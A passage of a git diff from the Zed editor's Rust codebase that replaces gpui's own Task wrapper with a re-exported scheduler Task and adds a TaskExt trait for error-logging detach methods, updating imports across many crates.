-14,7 +14,7 @@ use fuzzy_nucleo::{PathMatch, PathMatchCandidate}; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, KeyContext, Modifiers, ModifiersChangedEvent, ParentElement, Render, - StatefulInteractiveElement, Styled, Task, WeakEntity, Window, actions, rems, + StatefulInteractiveElement, Styled, Task, TaskExt, WeakEntity, Window, actions, rems, }; use open_path_prompt::{ OpenPathPrompt, diff --git a/crates/git_ui/src/branch_picker.rs b/crates/git_ui/src/branch_picker.rs index 69829231619175..64f1032ce59164 100644 --- a/crates/git_ui/src/branch_picker.rs +++ b/crates/git_ui/src/branch_picker.rs @@ -8,7 +8,7 @@ use gpui::http_client::Url; use gpui::{ Action, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, IntoElement, Modifiers, ModifiersChangedEvent, ParentElement, Render, - SharedString, Styled, Subscription, Task, WeakEntity, Window, actions, rems, + SharedString, Styled, Subscription, Task, TaskExt, WeakEntity, Window, actions, rems, }; use picker::{Picker, PickerDelegate, PickerEditorPosition}; use project::git_store::{Repository, RepositoryEvent}; diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index 820c880a1bd19a..a9e558b15664f5 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -39,8 +39,8 @@ use git::{ use gpui::{ AbsoluteLength, Action, Anchor, AsyncApp, AsyncWindowContext, Bounds, ClickEvent, DismissEvent, Empty, Entity, EventEmitter, FocusHandle, Focusable, KeyContext, MouseButton, MouseDownEvent, - Point, PromptLevel, ScrollStrategy, Subscription, Task, TextStyle, UniformListScrollHandle, - WeakEntity, actions, anchored, deferred, point, size, uniform_list, + Point, PromptLevel, ScrollStrategy, Subscription, Task, TaskExt, TextStyle, + UniformListScrollHandle, WeakEntity, actions, anchored, deferred, point, size, uniform_list, }; use itertools::Itertools; use language::{Buffer, File}; 
diff --git a/crates/git_ui/src/git_ui.rs b/crates/git_ui/src/git_ui.rs index f4c2a441d45e9c..4fda322cc89a23 100644 --- a/crates/git_ui/src/git_ui.rs +++ b/crates/git_ui/src/git_ui.rs @@ -17,7 +17,7 @@ use git::{ }; use gpui::{ App, ClipboardItem, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - SharedString, Subscription, Task, Window, + SharedString, Subscription, Task, TaskExt, Window, }; use menu::{Cancel, Confirm}; use project::git_store::Repository; diff --git a/crates/git_ui/src/stash_picker.rs b/crates/git_ui/src/stash_picker.rs index 6e6833f3cb4833..190fca9fa515d4 100644 --- a/crates/git_ui/src/stash_picker.rs +++ b/crates/git_ui/src/stash_picker.rs @@ -4,7 +4,7 @@ use git::stash::StashEntry; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, IntoElement, Modifiers, ModifiersChangedEvent, ParentElement, Render, - SharedString, Styled, Subscription, Task, WeakEntity, Window, actions, rems, + SharedString, Styled, Subscription, Task, TaskExt, WeakEntity, Window, actions, rems, }; use picker::{Picker, PickerDelegate}; use project::git_store::{Repository, RepositoryEvent}; diff --git a/crates/git_ui/src/worktree_picker.rs b/crates/git_ui/src/worktree_picker.rs index 49a42438f45d7e..8b22dfdd614415 100644 --- a/crates/git_ui/src/worktree_picker.rs +++ b/crates/git_ui/src/worktree_picker.rs @@ -7,8 +7,8 @@ use fuzzy::StringMatchCandidate; use git::repository::Worktree as GitWorktree; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - IntoElement, ParentElement, Render, SharedString, Styled, Subscription, Task, WeakEntity, - Window, actions, rems, + IntoElement, ParentElement, Render, SharedString, Styled, Subscription, Task, TaskExt, + WeakEntity, Window, actions, rems, }; use picker::{Picker, PickerDelegate, PickerEditorPosition}; use project::Project; diff --git a/crates/git_ui/src/worktree_service.rs 
b/crates/git_ui/src/worktree_service.rs index ba411cb06422fe..0ec34f3d915a74 100644 --- a/crates/git_ui/src/worktree_service.rs +++ b/crates/git_ui/src/worktree_service.rs @@ -4,7 +4,7 @@ use std::sync::Arc; use anyhow::anyhow; use collections::HashSet; use fs::Fs; -use gpui::{AsyncWindowContext, Entity, SharedString, WeakEntity}; +use gpui::{AsyncWindowContext, Entity, SharedString, TaskExt, WeakEntity}; use project::Project; use project::git_store::Repository; use project::project_settings::ProjectSettings; diff --git a/crates/gpui/src/executor.rs b/crates/gpui/src/executor.rs index ab253472ad8699..07f1667b6201e4 100644 --- a/crates/gpui/src/executor.rs +++ b/crates/gpui/src/executor.rs @@ -4,12 +4,11 @@ use futures::prelude::*; use gpui_util::{TryFutureExt, TryFutureExtBacktrace}; use scheduler::Instant; use scheduler::Scheduler; -use std::{ - fmt::Debug, future::Future, marker::PhantomData, mem, pin::Pin, rc::Rc, sync::Arc, - time::Duration, -}; +use std::{future::Future, marker::PhantomData, mem, pin::Pin, rc::Rc, sync::Arc, time::Duration}; -pub use scheduler::{FallibleTask, ForegroundExecutor as SchedulerForegroundExecutor, Priority}; +pub use scheduler::{ + FallibleTask, ForegroundExecutor as SchedulerForegroundExecutor, Priority, Task, +}; /// A pointer to the executor that is currently running, /// for spawning background tasks. @@ -28,83 +27,32 @@ pub struct ForegroundExecutor { not_send: PhantomData>, } -/// Task is a primitive that allows work to happen in the background. +/// Extension trait for `Task>` that adds `detach_and_log_err` with an `&App` context. /// -/// It implements [`Future`] so you can `.await` on it. -/// -/// If you drop a task it will be cancelled immediately. Calling [`Task::detach`] allows -/// the task to continue running, but with no way to return a value. -#[must_use] -#[derive(Debug)] -pub struct Task(scheduler::Task); - -impl Task { - /// Creates a new task that will resolve with the value. 
- pub fn ready(val: T) -> Self { - Task(scheduler::Task::ready(val)) - } - - /// Returns true if the task has completed or was created with `Task::ready`. - pub fn is_ready(&self) -> bool { - self.0.is_ready() - } - - /// Detaching a task runs it to completion in the background. - pub fn detach(self) { - self.0.detach() - } - - /// Wraps a scheduler::Task. - pub fn from_scheduler(task: scheduler::Task) -> Self { - Task(task) - } - - /// Converts this task into a fallible task that returns `Option`. - /// - /// Unlike the standard `Task`, a [`FallibleTask`] will return `None` - /// if the task was cancelled. - /// - /// # Example - /// - /// ```ignore - /// // Background task that gracefully handles cancellation: - /// cx.background_spawn(async move { - /// let result = foreground_task.fallible().await; - /// if let Some(value) = result { - /// // Process the value - /// } - /// // If None, task was cancelled - just exit gracefully - /// }).detach(); - /// ``` - pub fn fallible(self) -> FallibleTask { - self.0.fallible() - } +/// This trait is automatically implemented for all `Task>` types. +pub trait TaskExt { + /// Run the task to completion in the background and log any errors that occur. + fn detach_and_log_err(self, cx: &App); + /// Like [`Self::detach_and_log_err`], but uses `{:?}` formatting on failure so `anyhow::Error` + /// values emit their full backtrace. Prefer `detach_and_log_err` unless a backtrace is wanted. + fn detach_and_log_err_with_backtrace(self, cx: &App); } -impl Task> +impl TaskExt for Task> where T: 'static, - E: 'static + std::fmt::Display, + E: 'static + std::fmt::Display + std::fmt::Debug, { - /// Run the task to completion in the background and log any errors that occur. 
#[track_caller] - pub fn detach_and_log_err(self, cx: &App) { + fn detach_and_log_err(self, cx: &App) { let location = core::panic::Location::caller(); cx.foreground_executor() .spawn(self.log_tracked_err(*location)) .detach(); } -} -impl Task> -where - T: 'static, - E: 'static + std::fmt::Debug, -{ - /// Like [`Self::detach_and_log_err`], but uses `{:?}` formatting on failure so `anyhow::Error` - /// values emit their full backtrace. Prefer `detach_and_log_err` unless a backtrace is wanted. #[track_caller] - pub fn detach_and_log_err_with_backtrace(self, cx: &App) { + fn detach_and_log_err_with_backtrace(self, cx: &App) { let location = *core::panic::Location::caller(); cx.foreground_executor() .spawn(self.log_tracked_err_with_backtrace(location)) @@ -112,20 +60,6 @@ where } } -impl std::future::Future for Task { - type Output = T; - - fn poll( - self: std::pin::Pin<&mut Self>, - cx: &mut std::task::Context<'_>, - ) -> std::task::Poll { - // SAFETY: Task is a repr(transparent) wrapper around scheduler::Task, - // and we're just projecting the pin through to the inner task. - let inner = unsafe { self.map_unchecked_mut(|t| &mut t.0) }; - inner.poll(cx) - } -} - impl BackgroundExecutor { /// Creates a new BackgroundExecutor from the given PlatformDispatcher. pub fn new(dispatcher: Arc) -> Self { @@ -175,9 +109,9 @@ impl BackgroundExecutor { R: Send + 'static, { if priority == Priority::RealtimeAudio { - Task::from_scheduler(self.inner.spawn_realtime(future)) + self.inner.spawn_realtime(future) } else { - Task::from_scheduler(self.inner.spawn_with_priority(priority, future)) + self.inner.spawn_with_priority(priority, future) } } @@ -426,7 +360,7 @@ impl ForegroundExecutor { where R: 'static, { - Task::from_scheduler(self.inner.spawn(future.boxed_local())) + self.inner.spawn(future.boxed_local()) } /// Enqueues the given Task to run on the main thread with the given priority. 
@@ -440,7 +374,7 @@ impl ForegroundExecutor { R: 'static, { // Priority is ignored for foreground tasks - they run in order on the main thread - Task::from_scheduler(self.inner.spawn(future)) + self.inner.spawn(future) } /// Used by the test harness to run an async test in a synchronous fashion. diff --git a/crates/gpui/src/prelude.rs b/crates/gpui/src/prelude.rs index 191d0a0e6d4019..b5185a25e86198 100644 --- a/crates/gpui/src/prelude.rs +++ b/crates/gpui/src/prelude.rs @@ -5,5 +5,5 @@ pub use crate::{ AppContext as _, BorrowAppContext, Context, Element, InteractiveElement, IntoElement, ParentElement, Refineable, Render, RenderOnce, StatefulInteractiveElement, Styled, StyledImage, - VisualContext, util::FluentBuilder, + TaskExt as _, VisualContext, util::FluentBuilder, }; diff --git a/crates/inspector_ui/src/inspector.rs b/crates/inspector_ui/src/inspector.rs index b687ea70a57d0f..36eed3bc72c60c 100644 --- a/crates/inspector_ui/src/inspector.rs +++ b/crates/inspector_ui/src/inspector.rs @@ -1,5 +1,5 @@ use anyhow::{Context as _, anyhow}; -use gpui::{App, DivInspectorState, Inspector, InspectorElementId, IntoElement, Window}; +use gpui::{App, DivInspectorState, Inspector, InspectorElementId, IntoElement, TaskExt, Window}; use std::{cell::OnceCell, path::Path, sync::Arc}; use ui::{Label, Tooltip, prelude::*, utils::platform_title_bar_height}; use util::{ResultExt as _, command::new_command}; diff --git a/crates/journal/src/journal.rs b/crates/journal/src/journal.rs index b8028c79b3d5da..713317b70dbef9 100644 --- a/crates/journal/src/journal.rs +++ b/crates/journal/src/journal.rs @@ -1,7 +1,7 @@ use chrono::{Datelike, Local, NaiveTime, Timelike}; use editor::scroll::Autoscroll; use editor::{Editor, SelectionEffects}; -use gpui::{App, AppContext as _, Context, Window, actions}; +use gpui::{App, AppContext as _, Context, TaskExt, Window, actions}; pub use settings::HourFormat; use settings::{RegisterSetting, Settings}; use std::{ diff --git 
a/crates/language_models/src/provider/anthropic.rs b/crates/language_models/src/provider/anthropic.rs index af5e53300a785b..7f19b81d6dc3bb 100644 --- a/crates/language_models/src/provider/anthropic.rs +++ b/crates/language_models/src/provider/anthropic.rs @@ -5,7 +5,7 @@ use anyhow::Result; use collections::BTreeMap; use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, Task}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, Task, TaskExt}; use http_client::HttpClient; use language_model::{ ANTHROPIC_PROVIDER_ID, ANTHROPIC_PROVIDER_NAME, ApiKeyState, AuthenticateError, diff --git a/crates/language_models/src/provider/bedrock.rs b/crates/language_models/src/provider/bedrock.rs index fb48e7d73a20dc..97eb5456e5dbc4 100644 --- a/crates/language_models/src/provider/bedrock.rs +++ b/crates/language_models/src/provider/bedrock.rs @@ -25,7 +25,8 @@ use collections::{BTreeMap, HashMap}; use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture, stream::BoxStream}; use gpui::{ - AnyView, App, AsyncApp, Context, Entity, FocusHandle, Subscription, Task, Window, actions, + AnyView, App, AsyncApp, Context, Entity, FocusHandle, Subscription, Task, TaskExt, Window, + actions, }; use gpui_tokio::Tokio; use http_client::HttpClient; diff --git a/crates/language_models/src/provider/cloud.rs b/crates/language_models/src/provider/cloud.rs index 0dae88fc3072e3..c37b0162d45a16 100644 --- a/crates/language_models/src/provider/cloud.rs +++ b/crates/language_models/src/provider/cloud.rs @@ -7,7 +7,7 @@ use cloud_api_types::Plan; use futures::FutureExt; use futures::StreamExt; use futures::future::BoxFuture; -use gpui::{AnyElement, AnyView, App, AppContext, Context, Entity, Subscription, Task}; +use gpui::{AnyElement, AnyView, App, AppContext, Context, Entity, Subscription, Task, TaskExt}; use language_model::{ 
AuthenticateError, IconOrSvg, LanguageModel, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, ZED_CLOUD_PROVIDER_ID, diff --git a/crates/language_models/src/provider/deepseek.rs b/crates/language_models/src/provider/deepseek.rs index 9f10da20c124b5..757539a0895396 100644 --- a/crates/language_models/src/provider/deepseek.rs +++ b/crates/language_models/src/provider/deepseek.rs @@ -5,7 +5,7 @@ use deepseek::DEEPSEEK_API_URL; use futures::Stream; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/google.rs b/crates/language_models/src/provider/google.rs index 87f2eeb26ab0f8..d5b47bf4583126 100644 --- a/crates/language_models/src/provider/google.rs +++ b/crates/language_models/src/provider/google.rs @@ -4,7 +4,7 @@ use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; pub use google_ai::completion::{GoogleEventMapper, into_google}; use google_ai::{GenerateContentResponse, GoogleModelMode}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ AuthenticateError, ConfigurationViewTargetAgent, EnvVar, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/lmstudio.rs b/crates/language_models/src/provider/lmstudio.rs index 50ac12865240e4..ea19c265e9c5d2 100644 --- a/crates/language_models/src/provider/lmstudio.rs +++ b/crates/language_models/src/provider/lmstudio.rs @@ -4,7 +4,7 @@ use 
credentials_provider::CredentialsProvider; use fs::Fs; use futures::Stream; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; -use gpui::{AnyView, App, AsyncApp, Context, CursorStyle, Entity, Subscription, Task}; +use gpui::{AnyView, App, AsyncApp, Context, CursorStyle, Entity, Subscription, Task, TaskExt}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/mistral.rs b/crates/language_models/src/provider/mistral.rs index 403d94e9832178..65eea3b696b498 100644 --- a/crates/language_models/src/provider/mistral.rs +++ b/crates/language_models/src/provider/mistral.rs @@ -3,7 +3,7 @@ use collections::BTreeMap; use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture, stream::BoxStream}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, Global, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, Global, SharedString, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/ollama.rs b/crates/language_models/src/provider/ollama.rs index f38321b7c88187..d117bce3784b6e 100644 --- a/crates/language_models/src/provider/ollama.rs +++ b/crates/language_models/src/provider/ollama.rs @@ -3,7 +3,7 @@ use credentials_provider::CredentialsProvider; use fs::Fs; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; use futures::{Stream, TryFutureExt, stream}; -use gpui::{AnyView, App, AsyncApp, Context, CursorStyle, Entity, Task}; +use gpui::{AnyView, App, AsyncApp, Context, CursorStyle, Entity, Task, TaskExt}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, 
LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/open_ai.rs b/crates/language_models/src/provider/open_ai.rs index 5557ce2d047887..4957eea9635e3d 100644 --- a/crates/language_models/src/provider/open_ai.rs +++ b/crates/language_models/src/provider/open_ai.rs @@ -2,7 +2,7 @@ use anyhow::Result; use collections::BTreeMap; use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/open_ai_compatible.rs b/crates/language_models/src/provider/open_ai_compatible.rs index 5f7f6db3d36a45..a80965eced5ce5 100644 --- a/crates/language_models/src/provider/open_ai_compatible.rs +++ b/crates/language_models/src/provider/open_ai_compatible.rs @@ -2,7 +2,7 @@ use anyhow::Result; use convert_case::{Case, Casing}; use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/open_router.rs b/crates/language_models/src/provider/open_router.rs index bc4fbcc9aa761d..c0b0e330629427 100644 --- a/crates/language_models/src/provider/open_router.rs +++ b/crates/language_models/src/provider/open_router.rs @@ -2,7 +2,7 @@ use anyhow::Result; use collections::HashMap; use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, 
future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/opencode.rs b/crates/language_models/src/provider/opencode.rs index 4380d2e1a13c1f..647e8496b0577b 100644 --- a/crates/language_models/src/provider/opencode.rs +++ b/crates/language_models/src/provider/opencode.rs @@ -3,7 +3,7 @@ use collections::BTreeMap; use credentials_provider::CredentialsProvider; use fs::Fs; use futures::{FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::{AsyncBody, HttpClient, http}; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/vercel_ai_gateway.rs b/crates/language_models/src/provider/vercel_ai_gateway.rs index 789e8e35e8546a..312cdee5a6605b 100644 --- a/crates/language_models/src/provider/vercel_ai_gateway.rs +++ b/crates/language_models/src/provider/vercel_ai_gateway.rs @@ -2,7 +2,7 @@ use anyhow::Result; use collections::BTreeMap; use credentials_provider::CredentialsProvider; use futures::{AsyncReadExt, FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest, http}; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/x_ai.rs 
b/crates/language_models/src/provider/x_ai.rs index 12f195417b5220..623853b5214acc 100644 --- a/crates/language_models/src/provider/x_ai.rs +++ b/crates/language_models/src/provider/x_ai.rs @@ -2,7 +2,7 @@ use anyhow::Result; use collections::BTreeMap; use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_selector/src/language_selector.rs b/crates/language_selector/src/language_selector.rs index 70a03514f45371..cd457cb50f943b 100644 --- a/crates/language_selector/src/language_selector.rs +++ b/crates/language_selector/src/language_selector.rs @@ -6,7 +6,7 @@ use editor::Editor; use fuzzy::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, ParentElement, - Render, Styled, WeakEntity, Window, actions, + Render, Styled, TaskExt, WeakEntity, Window, actions, }; use language::{Buffer, LanguageMatcher, LanguageName, LanguageRegistry}; use open_path_prompt::file_finder_settings::FileFinderSettings; diff --git a/crates/language_tools/src/lsp_button.rs b/crates/language_tools/src/lsp_button.rs index 8fbe4385a172f3..63529ea0cf300d 100644 --- a/crates/language_tools/src/lsp_button.rs +++ b/crates/language_tools/src/lsp_button.rs @@ -13,7 +13,7 @@ use language::language_settings::{EditPredictionProvider, all_language_settings} use client::proto; use collections::HashSet; use editor::{Editor, EditorEvent}; -use gpui::{Anchor, Entity, Subscription, Task, WeakEntity, actions}; +use gpui::{Anchor, Entity, Subscription, Task, TaskExt, WeakEntity, actions}; use language::{BinaryStatus, BufferId, ServerHealth}; use 
lsp::{LanguageServerId, LanguageServerName, LanguageServerSelector}; use project::{ diff --git a/crates/onboarding/src/basics_page.rs b/crates/onboarding/src/basics_page.rs index 7d021c54447666..30e69a320ea3d4 100644 --- a/crates/onboarding/src/basics_page.rs +++ b/crates/onboarding/src/basics_page.rs @@ -5,7 +5,7 @@ use client::{Client, TelemetrySettings, UserStore, zed_urls}; use cloud_api_types::Plan; use collections::HashMap; use fs::Fs; -use gpui::{Action, Animation, AnimationExt, App, Entity, IntoElement, pulsating_between}; +use gpui::{Action, Animation, AnimationExt, App, Entity, IntoElement, TaskExt, pulsating_between}; use project::agent_server_store::AllAgentServersSettings; use project::project_settings::ProjectSettings; use project::{AgentRegistryStore, RegistryAgent}; diff --git a/crates/outline_panel/src/outline_panel.rs b/crates/outline_panel/src/outline_panel.rs index 7b378c6fb8283f..9e179c97a7d60b 100644 --- a/crates/outline_panel/src/outline_panel.rs +++ b/crates/outline_panel/src/outline_panel.rs @@ -18,7 +18,7 @@ use gpui::{ DismissEvent, Div, ElementId, Entity, EventEmitter, FocusHandle, Focusable, HighlightStyle, InteractiveElement, IntoElement, KeyContext, ListHorizontalSizingBehavior, ListSizingBehavior, MouseButton, MouseDownEvent, ParentElement, Pixels, Point, Render, ScrollStrategy, - SharedString, Stateful, StatefulInteractiveElement as _, Styled, Subscription, Task, + SharedString, Stateful, StatefulInteractiveElement as _, Styled, Subscription, Task, TaskExt, UniformListScrollHandle, WeakEntity, Window, actions, anchored, deferred, div, point, px, size, uniform_list, }; diff --git a/crates/project/src/agent_registry_store.rs b/crates/project/src/agent_registry_store.rs index b2010da65d9477..21c07b0feba68b 100644 --- a/crates/project/src/agent_registry_store.rs +++ b/crates/project/src/agent_registry_store.rs @@ -6,7 +6,7 @@ use anyhow::{Context as _, Result, bail}; use collections::HashMap; use fs::Fs; use futures::AsyncReadExt; -use 
gpui::{App, AppContext as _, Context, Entity, Global, SharedString, Task}; +use gpui::{App, AppContext as _, Context, Entity, Global, SharedString, Task, TaskExt}; use http_client::{AsyncBody, HttpClient}; use serde::Deserialize; use settings::Settings as _; diff --git a/crates/project/src/agent_server_store.rs b/crates/project/src/agent_server_store.rs index cdde687ec63233..3d231a3e8ef359 100644 --- a/crates/project/src/agent_server_store.rs +++ b/crates/project/src/agent_server_store.rs @@ -8,7 +8,7 @@ use std::{ use anyhow::{Context as _, Result, bail}; use collections::HashMap; use fs::Fs; -use gpui::{AsyncApp, Context, Entity, EventEmitter, SharedString, Subscription, Task}; +use gpui::{AsyncApp, Context, Entity, EventEmitter, SharedString, Subscription, Task, TaskExt}; use http_client::{HttpClient, github::AssetKind}; use node_runtime::NodeRuntime; use percent_encoding::percent_decode_str; diff --git a/crates/project/src/buffer_store.rs b/crates/project/src/buffer_store.rs index 2e234a7f936e7b..f9076753998e93 100644 --- a/crates/project/src/buffer_store.rs +++ b/crates/project/src/buffer_store.rs @@ -8,7 +8,8 @@ use client::Client; use collections::{HashMap, HashSet, hash_map}; use futures::{Future, FutureExt as _, channel::oneshot, future::Shared}; use gpui::{ - App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, WeakEntity, + App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, TaskExt, + WeakEntity, }; use language::{ Buffer, BufferEvent, Capability, DiskState, File as _, Language, LineEnding, Operation, diff --git a/crates/project/src/context_server_store.rs b/crates/project/src/context_server_store.rs index 7b9fc16f100228..1ea6d2c41887d7 100644 --- a/crates/project/src/context_server_store.rs +++ b/crates/project/src/context_server_store.rs @@ -13,7 +13,9 @@ use context_server::{ContextServer, ContextServerCommand, ContextServerId}; use credentials_provider::CredentialsProvider; use 
futures::future::Either; use futures::{FutureExt as _, StreamExt as _, future::join_all}; -use gpui::{App, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, WeakEntity, actions}; +use gpui::{ + App, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, TaskExt, WeakEntity, actions, +}; use http_client::HttpClient; use itertools::Itertools; use rand::Rng as _; diff --git a/crates/project/src/debugger/dap_store.rs b/crates/project/src/debugger/dap_store.rs index 7ac9c02fe4fbf2..e0594467f0937a 100644 --- a/crates/project/src/debugger/dap_store.rs +++ b/crates/project/src/debugger/dap_store.rs @@ -30,7 +30,7 @@ use futures::{ channel::mpsc::{self, UnboundedSender}, future::{Shared, join_all}, }; -use gpui::{App, AppContext, AsyncApp, Context, Entity, EventEmitter, SharedString, Task}; +use gpui::{App, AppContext, AsyncApp, Context, Entity, EventEmitter, SharedString, Task, TaskExt}; use http_client::HttpClient; use language::{Buffer, LanguageToolchainStore}; use node_runtime::NodeRuntime; diff --git a/crates/project/src/debugger/session.rs b/crates/project/src/debugger/session.rs index feba6ff5520681..39578eaf8f0b52 100644 --- a/crates/project/src/debugger/session.rs +++ b/crates/project/src/debugger/session.rs @@ -38,7 +38,7 @@ use futures::{AsyncBufReadExt as _, SinkExt, StreamExt, TryStreamExt}; use futures::{FutureExt, future::Shared}; use gpui::{ App, AppContext, AsyncApp, BackgroundExecutor, Context, Entity, EventEmitter, SharedString, - Task, WeakEntity, + Task, TaskExt, WeakEntity, }; use http_client::HttpClient; use node_runtime::NodeRuntime; diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index d5c6565b6ccd80..8f49e4c91832c0 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -47,7 +47,7 @@ use git::{ }; use gpui::{ App, AppContext, AsyncApp, BackgroundExecutor, Context, Entity, EventEmitter, SharedString, - Subscription, Task, WeakEntity, + Subscription, Task, TaskExt, 
WeakEntity, }; use language::{ Buffer, BufferEvent, Language, LanguageRegistry, diff --git a/crates/project/src/lsp_command.rs b/crates/project/src/lsp_command.rs index e22f478eb9b95e..e110176dd208f7 100644 --- a/crates/project/src/lsp_command.rs +++ b/crates/project/src/lsp_command.rs @@ -14,7 +14,7 @@ use client::proto::{self, PeerId}; use clock::Global; use collections::HashMap; use futures::future; -use gpui::{App, AsyncApp, Entity, SharedString, Task, prelude::FluentBuilder}; +use gpui::{App, AsyncApp, Entity, SharedString, Task, TaskExt, prelude::FluentBuilder}; use language::{ Anchor, Bias, Buffer, BufferSnapshot, CachedLspAdapter, CharKind, CharScopeContext, OffsetRangeExt, PointUtf16, ToOffset, ToPointUtf16, Transaction, Unclipped, diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index ad3344fa25a7d7..85229cfdcdeb34 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -65,7 +65,7 @@ use futures::{ use globset::{Glob, GlobBuilder, GlobMatcher, GlobSet, GlobSetBuilder}; use gpui::{ App, AppContext, AsyncApp, Context, Entity, EventEmitter, PromptLevel, SharedString, - Subscription, Task, WeakEntity, + Subscription, Task, TaskExt, WeakEntity, }; use http_client::HttpClient; use itertools::Itertools as _; diff --git a/crates/project/src/lsp_store/log_store.rs b/crates/project/src/lsp_store/log_store.rs index ae6f9ec09d4192..0cfe3c14cf2cba 100644 --- a/crates/project/src/lsp_store/log_store.rs +++ b/crates/project/src/lsp_store/log_store.rs @@ -2,7 +2,9 @@ use std::{collections::VecDeque, sync::Arc}; use collections::HashMap; use futures::{StreamExt, channel::mpsc}; -use gpui::{App, AppContext as _, Context, Entity, EventEmitter, Global, Subscription, WeakEntity}; +use gpui::{ + App, AppContext as _, Context, Entity, EventEmitter, Global, Subscription, TaskExt, WeakEntity, +}; use lsp::{ IoKind, LanguageServer, LanguageServerId, LanguageServerName, LanguageServerSelector, MessageType, TraceValue, 
